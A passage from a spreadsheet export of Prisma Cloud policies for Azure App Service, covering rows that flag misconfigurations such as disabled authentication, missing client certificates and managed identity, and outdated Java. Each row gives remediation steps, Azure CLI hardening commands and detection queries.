          <t>Privilege escalation risk due to a publicly exposed and unauthenticated Azure App Service web application with insecure permissions</t>
        </is>
      </c>
      <c r="L2184" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M2184" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2184" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2184" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2184" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2184" t="inlineStr"/>
      <c r="R2184" t="inlineStr"/>
      <c r="S2184" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2184" t="b">
        <v>0</v>
      </c>
      <c r="U2184" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2184" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2184" t="inlineStr">
        <is>
          <t>This policy identifies Azure App Service web apps that are publicly exposed, not configured with web app authentication and have risky permissions that could potentially lead to privilege escalation.
Publicly exposed Azure App Service web apps without web app authentication could allow malicious actors to remotely exploit and get the initial access to the resource. The risky permissions on the web app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configure App services with web app authentication, review risky privilege escalation permissions, and restrict public exposure reported for the App services as soon as possible.</t>
        </is>
      </c>
      <c r="X2184" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
1. Log in to the Azure portal
2. Navigate to App Services
3. Click on the reported App Service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Navigate to App Services
3. Click on the reported App
4. Under Setting section, Click on 'Authentication / Authorization'
5. Set 'App Service Authentication' to 'On'
6. Choose other parameters as per your requirement and Click on 'Save'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built-in or custom role without risky permissions, if necessary</t>
        </is>
      </c>
      <c r="Y2184" t="inlineStr"/>
      <c r="Z2184" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-app-service') and finding.name contains all ('Azure App Service web apps with public network access','Azure entities with risky permissions','Azure App Service Web app authentication is off')</t>
        </is>
      </c>
      <c r="AA2184" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2184" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:25</t>
        </is>
      </c>
      <c r="AC2184" t="inlineStr"/>
      <c r="AD2184" t="b">
        <v>1</v>
      </c>
      <c r="AE2184" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2184" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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4" t="inlineStr">
        <is>
          <t>3d4197f9-983a-41f5-ab92-29cd4e7c61e2</t>
        </is>
      </c>
      <c r="AI2184" t="inlineStr">
        <is>
          <t>ce494e43-773b-4f07-82e4-cca1c43e8c69</t>
        </is>
      </c>
      <c r="AJ2184" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2184" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2185">
      <c r="A2185" t="inlineStr">
        <is>
          <t>ACSC Information Security Manual (ISM), FFIEC, TX-RAMP Level 2, CIS Controls v7.1, Insurance Regulatory And Development Authority Of India, CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, TX-RAMP Level 1, NIST SP 800-171 Revision 3, CSA CCM v.4.0.6, CIS Controls v8, Copy of New Zealand Information Security Manual (NZISM v3.4), RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, TX-RAMP Level 2, CSA CCM v4.0.12, kfirdaus AWS Account-CS, CIS Controls v7.1, CIS Controls v8.1, CSA CCM v.4.0.6, ISO 27002:2022, ITSG-33, CIS Controls v8.1, New Zealand Information Security Manual (NZISM v3.4), GDPR, Copy of CIS Controls v8, RBI Baseline Cyber Security and Resilience Requirements, NIST 800-53 Rev 5, CSA CCM v4.0.12, CSA CCM v4.0.12, kashan ACSC Information Security Manual (ISM), ITSG-33, ITSG-33, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2022.2.1</t>
        </is>
      </c>
      <c r="B2185" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2185" s="2" t="inlineStr"/>
      <c r="D2185" t="inlineStr"/>
      <c r="E2185" t="inlineStr"/>
      <c r="F2185" t="inlineStr"/>
      <c r="G2185" t="b">
        <v>1</v>
      </c>
      <c r="H21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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2185" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2185" t="inlineStr">
        <is>
          <t>Azure Function App client certificate is disabled</t>
        </is>
      </c>
      <c r="L2185" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2185" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2185" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2185" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2185" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2185" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2185" t="inlineStr">
        <is>
          <t>ISM-1321</t>
        </is>
      </c>
      <c r="S2185" t="inlineStr"/>
      <c r="T2185" t="b">
        <v>1</v>
      </c>
      <c r="U2185" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2185" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2185" t="inlineStr">
        <is>
          <t>This policy identifies Azure Function App which are not set with client certificate. Client certificates allow for the app to request a certificate for incoming requests. Only clients that have a valid certificate will be able to reach the app.</t>
        </is>
      </c>
      <c r="X2185" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to Function App
3. Click on the reported Function App
4. Under Setting section, Click on 'Configuration'
5. Under 'General Settings' tab, In 'Incoming client certificates', Set 'Client certificate mode' to Require
6. Click on 'Save'
If Function App Hosted in Linux using Consumption (Serverless) Plan follow below steps
Azure CLI Command - \"az functionapp update --set clientCertEnabled=true --name MyFunctionApp --resource-group MyResourceGroup\"</t>
        </is>
      </c>
      <c r="Y2185" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Web/sites/Write' permission. Successful execution enables Client certificates,
only clients that have a valid certificate will be able to reach the app.",
'impact': 'Enables client certificate in Azure Function App',
'cliScriptTemplate': 'az functionapp update --resource-group $resourceGroup --name $resourceName --set clientCertEnabled=true'</t>
        </is>
      </c>
      <c r="Z2185" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = properties.state equal ignore case "Running" AND kind contains "functionapp" AND kind does not contain "workflowapp" AND kind does not equal "app" AND properties.clientCertEnabled is false</t>
        </is>
      </c>
      <c r="AA2185" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2185" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2185" t="inlineStr">
        <is>
          <t>PC-AZR-APP-679</t>
        </is>
      </c>
      <c r="AD2185" t="b">
        <v>1</v>
      </c>
      <c r="AE2185" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2185" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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5" t="inlineStr">
        <is>
          <t>55c94d7a-9608-4fa7-bd08-d99c05c2678a</t>
        </is>
      </c>
      <c r="AI2185" t="inlineStr">
        <is>
          <t>60257de1-5ca3-468d-aac0-c522b0e862e1</t>
        </is>
      </c>
      <c r="AJ2185" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2185" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2186">
      <c r="A2186" t="inlineStr">
        <is>
          <t>Copy of CIS v1.2.0 (Azure), ISO/IEC 27001:2022, CIS v2.0.0 (Azure) Level 1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27017:2015, NIST CSF, NIST SP 800-171 Revision 2, Demo_Daryl ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, CIS v1.1 (Azure), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, Insurance Regulatory And Development Authority Of India, NIST SP 800-172, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST CSF, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO 27002:2022, ISO/IEC 27018:2019, ISO/IEC 27002:2013, CIS v1.5.0 (Azure) - Level 1, Microsoft Cloud Security Benchmark v1, NIST SP 800-171 Revision 3, CSA CCM v4.0.12, ISO 27002:2022, ISO/IEC 27002:2013, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27017:2015, ISO/IEC 27018:2019, kashan ACSC Information Security Manual (ISM), CIS v2.1.0 (Azure) Level 1, Copy of Azure Security Benchmark (v3), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), CIS v1.2.0 (Azure), ISO/IEC 27017:2015, CSA CCM v.4.0.1, CIS v1.4.0 (Azure), Sarbanes Oxley Act (SOX), PCI DSS v4.0, ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), PCI DSS v3.2.1, CIS Controls v8, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS v1.3.1 (Azure), CSA CCM v.4.0.1, ISO/IEC 27017:2015, CSA CCM v.4.0.1, MTSBv2_Azure, ISO/IEC 27001:2022, NIST CSF, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, Azure Security Benchmark (v3), CSA CCM v.4.0.1, Azure Security Benchmark (v2), HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CIS v1.3.0 (Azure), ISO/IEC 27002:2013, CSA CCM v4.0.12, CCPA 2018, PIPEDA, Demo_Daryl ACSC Information Security Manual (ISM), CyberSecurity Law of the People's Republic of China, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, ISO/IEC 27002:2013, testazure, CIS Controls v7.1, ISO/IEC 27002:2013, ISO/IEC 27001:2022, Australian Energy Sector Cyber Security Framework (AESCSF), NIST SP 800-172, CIS Controls v8.1, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2186" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2186" s="2" t="inlineStr"/>
      <c r="D2186" t="inlineStr"/>
      <c r="E2186" t="inlineStr"/>
      <c r="F2186" t="inlineStr"/>
      <c r="G2186" t="b">
        <v>1</v>
      </c>
      <c r="H21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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2186" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2186" t="inlineStr">
        <is>
          <t>Azure App Service Web app doesn't have a Managed Service Identity</t>
        </is>
      </c>
      <c r="L2186" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2186" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2186" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2186" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2186" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2186" t="inlineStr">
        <is>
          <t>9</t>
        </is>
      </c>
      <c r="R2186" t="inlineStr">
        <is>
          <t>9.5</t>
        </is>
      </c>
      <c r="S2186" t="inlineStr">
        <is>
          <t>AppService</t>
        </is>
      </c>
      <c r="T2186" t="b">
        <v>1</v>
      </c>
      <c r="U2186" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2186" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2186" t="inlineStr">
        <is>
          <t>This policy identifies Azure App Services that are not configured with managed service identity. Managed Service Identity in App Service makes the app more secure by eliminating secrets from the app, such as credentials in the connection strings. When registering with Azure Active Directory in the app service, the app will connect to other Azure services securely without the need for username and passwords.</t>
        </is>
      </c>
      <c r="X2186" t="inlineStr">
        <is>
          <t>To configure managed service identity on your reported App Service, follow the below URL instructions:
https://docs.microsoft.com/en-us/azure/app-service/overview-managed-identity 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-managed-identity-provider-is-enabled-for-app-services
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-managed-identity-provider-is-enabled-for-app-services</t>
        </is>
      </c>
      <c r="Y2186" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Web/sites/app_name/config/*' permission. Successful execution sets managed service identity in App Service,
that makes the app more secure by eliminating secrets from the app,
such as credentials in the connection strings.",
'impact': 'Sets managed service identity in Azure App Service',
'cliScriptTemplate': 'az webapp identity assign --resource-group $resourceGroup --name $resourceName'</t>
        </is>
      </c>
      <c r="Z2186" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = kind starts with app and (identity.type does not exist or (identity.type exists and identity.type does not contain SystemAssigned and identity.type does not contain UserAssigned))
{"category":"General","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA2186" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2186" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2186" t="inlineStr">
        <is>
          <t>PC-AZR-APP-415-CKV_AZURE_71</t>
        </is>
      </c>
      <c r="AD2186" t="b">
        <v>1</v>
      </c>
      <c r="AE2186" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2186" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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6" t="inlineStr">
        <is>
          <t>329e3b79-b374-4434-b7c8-4d292aa4f991</t>
        </is>
      </c>
      <c r="AI2186" t="inlineStr">
        <is>
          <t>b6caba6b-cdb1-4db5-8045-9d0354a602de</t>
        </is>
      </c>
      <c r="AJ2186" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2186" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2187">
      <c r="A2187" t="inlineStr">
        <is>
          <t>Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v4.0, CIS Controls v8, CSA CCM v4.0.12, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, CSA CCM v.4.0.6, TX-RAMP Level 1, PCI DSS v4.0, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.6, FFIEC, Telecommunications Security Act - TSA, CSA CCM v.4.0.6, RBI Baseline Cyber Security and Resilience Requirements, Insurance Regulatory And Development Authority Of India, CIS Controls v7.1, PCI DSS v4.0, TX-RAMP Level 2, kashan ACSC Information Security Manual (ISM), Australian Energy Sector Cyber Security Framework (AESCSF), CIS Controls v7.1, Australian Cyber Security Centre (ACSC) Essential Eight, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, ISO/IEC 27001:2022, CIS Controls v8.1, CSA CCM v4.0.12, ITSG-33, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), ISO 27002:2022, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B2187" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2187" s="2" t="inlineStr"/>
      <c r="D2187" t="inlineStr"/>
      <c r="E2187" t="inlineStr"/>
      <c r="F2187" t="inlineStr"/>
      <c r="G2187" t="b">
        <v>1</v>
      </c>
      <c r="H21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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2187" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2187" t="inlineStr">
        <is>
          <t>Azure Function App authentication is off</t>
        </is>
      </c>
      <c r="L2187" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2187" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2187" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2187" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2187" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2187" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2187" t="inlineStr">
        <is>
          <t>ISM-1603</t>
        </is>
      </c>
      <c r="S2187" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2187" t="b">
        <v>0</v>
      </c>
      <c r="U2187" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2187" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2187" t="inlineStr">
        <is>
          <t>This policy identifies Azure Function App which has set authentication to off. Azure Function App Authentication is a feature that can prevent anonymous HTTP requests from reaching the API app, or authenticate those that have tokens before they reach the API app. If an anonymous request is received from a browser, Function App will redirect to a logon page. To handle the logon process, a choice from a set of identity providers can be made, or a custom authentication mechanism can be implemented.</t>
        </is>
      </c>
      <c r="X2187" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to Function App
3. Click on the reported Function App
4. Under Settings section, Click on 'Authentication'
5. Click on 'Add identity provider'
6. Select an identity provider from the dropdown and choose other parameters as per your requirement
7. Click on 'Add' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-function-apps-enables-authentication
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-function-apps-enables-authentication</t>
        </is>
      </c>
      <c r="Y2187" t="inlineStr"/>
      <c r="Z2187" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = properties.state equal ignore case Running and kind contains functionapp and kind does not contain workflowapp and kind does not equal app and config.siteAuthEnabled is false
{"category":"General","resourceTypes":["azurerm_function_app"]}</t>
        </is>
      </c>
      <c r="AA2187" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2187" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2187" t="inlineStr">
        <is>
          <t>PC-AZR-APP-680-CKV_AZURE_56</t>
        </is>
      </c>
      <c r="AD2187" t="b">
        <v>1</v>
      </c>
      <c r="AE2187" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2187" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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7" t="inlineStr">
        <is>
          <t>90dc2872-7c50-4a57-a2af-4fc6fea535c5</t>
        </is>
      </c>
      <c r="AI2187" t="inlineStr">
        <is>
          <t>b363fa7f-b967-4f99-9194-8ff0730372f6</t>
        </is>
      </c>
      <c r="AJ2187" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2187" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2188">
      <c r="A2188" t="inlineStr"/>
      <c r="B2188" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2188" s="2" t="inlineStr"/>
      <c r="D2188" t="inlineStr"/>
      <c r="E2188" t="inlineStr"/>
      <c r="F2188" t="inlineStr"/>
      <c r="G2188" t="b">
        <v>1</v>
      </c>
      <c r="H21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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2188" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2188" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) risk due to publicly exposed and vulnerable Azure Function [Node.js, CVE-2021-21315]</t>
        </is>
      </c>
      <c r="L2188" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2188" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2188" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2188" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2188" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2188" t="inlineStr"/>
      <c r="R2188" t="inlineStr"/>
      <c r="S2188" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2188" t="b">
        <v>0</v>
      </c>
      <c r="U2188" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2188" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2188" t="inlineStr">
        <is>
          <t>This policy identifies Azure Functions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Azure Function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Node.js [CVE-2021-21315] vulnerability and public exposure reported for the Azure Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2188"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2188" t="inlineStr"/>
      <c r="Z2188" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('azure-app-service') and finding.name contains all ('(Disabled) Azure Function app configured with public network access') AND with : (Vuln WHERE id IN ('CVE-2021-21315'))</t>
        </is>
      </c>
      <c r="AA2188" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2188" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:54</t>
        </is>
      </c>
      <c r="AC2188" t="inlineStr"/>
      <c r="AD2188" t="b">
        <v>1</v>
      </c>
      <c r="AE2188" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2188" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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8" t="inlineStr">
        <is>
          <t>1c1004b6-1a65-4945-82d1-e50db68cbfa4</t>
        </is>
      </c>
      <c r="AI2188" t="inlineStr">
        <is>
          <t>fbd3c82e-834c-4bc2-8129-e754e9705763</t>
        </is>
      </c>
      <c r="AJ2188" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2188" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2189">
      <c r="A2189" t="inlineStr">
        <is>
          <t>Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CSA CCM v4.0.12, Azure Security Benchmark (v2), NIST SP 800-171 Revision 2, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, CRI Profile v1.2.1, NIST CSF v2.0, NIST SP 800-171 Revision 3, New Zealand Information Security Manual (NZISM v3.4), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, Azure Security Benchmark (v2), NIST SP 800-172, CIS Controls v8, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ACSC Information Security Manual (ISM), Copy of Azure Security Benchmark (v3), MITRE ATT&amp;CK v8.2 [Deprecated], Azure Security Benchmark (v3), APRA (CPS 234) Information Security, CIS Controls v7.1, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8.1, FFIEC, Copy of CIS Controls v8, MITRE ATT&amp;CK v10.0 [Deprecated], Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, ITSG-33, CSA CCM v.4.0.6, CSA CCM v.4.0.6, PCI DSS v4.0, CIS v2.0.0 (Azure) Level 1, CIS v1.4.0 (Azure), CSA CCM v.4.0.6, MITRE ATT&amp;CK v12, CRI Profile v2.0, DORA, MLPS 2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.3.0 (Azure), Copy of Azure Security Benchmark (v3), CDC NIST 800-53 Rev4, CIS v1.5.0 (Azure) - Level 1, ISO/IEC 27001:2022, CRI Profile v1.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Matt's ATT&amp;ACK, Secure Controls Framework (SCF) - 2022.2.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO 27002:2022, TX-RAMP Level 2, kfirdaus AWS Account-CS, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Copy of CIS Controls v8, PCI DSS v3.2.1, NIST CSF, Copy of New Zealand Information Security Manual (NZISM v3.4), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CIS Controls v8, ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], CIS v1.2.0 (Azure), FFIEC, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v2.1.0 (Azure) Level 1, TX-RAMP Level 1, CIS v1.3.1 (Azure), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, Australian Cyber Security Centre (ACSC) Essential Eight, NIST CSF v2.0, TX-RAMP Level 1, HITRUST v.9.4.2 [Deprecated], CIS Controls v7.1, NIST 800-53 Rev4, Azure Security Benchmark (v3), MTSBv2_Azure, CIS v1.1 (Azure), NIST CSF v2.0, Copy of CIS v1.2.0 (Azure), testazure, CCPA 2018, PIPEDA, CIS Controls v8.1, PCI DSS v4.0, NIST 800-53 Rev 5, Brazilian Data Protection Law (LGPD), Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, RBI Baseline Cyber Security and Resilience Requirements, Sarbanes Oxley Act (SOX), CyberSecurity Law of the People's Republic of China, MLPS 2.0 (Level 2), NIST SP 800-172, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements</t>
        </is>
      </c>
      <c r="B2189" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2189" s="2" t="inlineStr"/>
      <c r="D2189" t="inlineStr"/>
      <c r="E2189" t="inlineStr"/>
      <c r="F2189" t="inlineStr"/>
      <c r="G2189" t="b">
        <v>0</v>
      </c>
      <c r="H21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89" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2189" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2189" t="inlineStr">
        <is>
          <t>Azure App Service Web app doesn't use latest Java version</t>
        </is>
      </c>
      <c r="L2189" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2189" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2189" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2189" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2189" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2189" t="inlineStr">
        <is>
          <t>9</t>
        </is>
      </c>
      <c r="R2189" t="inlineStr">
        <is>
          <t>9.9</t>
        </is>
      </c>
      <c r="S2189" t="inlineStr">
        <is>
          <t>AppService</t>
        </is>
      </c>
      <c r="T2189" t="b">
        <v>0</v>
      </c>
      <c r="U2189" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2189" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2189" t="inlineStr">
        <is>
          <t>This policy identifies Azure web apps that don't use the latest Java version. Periodically, newer versions are released for Java software either due to security flaws or to include additional functionality. Using the latest Java version for web apps is recommended in order to take advantage of security fixes if any.</t>
        </is>
      </c>
      <c r="X2189" t="inlineStr">
        <is>
          <t>1. Log in to Azure console
2. Go to App Services
3. Click on the reported App
4. Under Settings section, Click on Configuration
5. Select General settings
6. In Stack settings section, ensure that Stack is set with the latest Java version.
7. Click on Save</t>
        </is>
      </c>
      <c r="Y2189" t="inlineStr"/>
      <c r="Z2189" t="inlineStr">
        <is>
